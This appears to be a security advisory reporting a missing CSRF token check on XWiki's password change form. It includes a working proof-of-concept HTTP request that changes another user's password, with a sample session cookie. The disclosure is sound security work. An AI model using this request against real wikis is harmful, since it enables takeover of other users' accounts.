There is no protection against CSRF type attacks on the password change form. The form_token parameter is not checked on the server side. It is possible to create a request without this parameter, and the password will be changed.
It is therefore very easy, under the condition of tricking an administrator, to be able to change the password of any user of the Wiki.
Here is an example of a query that allows you to change a password (user toto) on the current stable version of XWiki (POST and GET methods are possible):
GET /xwiki/bin/view/XWiki/toto?xpage=passwd&xwikipassword=aaaaaaaa&xwikipassword2=aaaaaaaa HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=1AC1B58E461B85FBE5E1C980197C5A64; username="XXX"; password="XXX"; rememberme="false"; validation="XXX"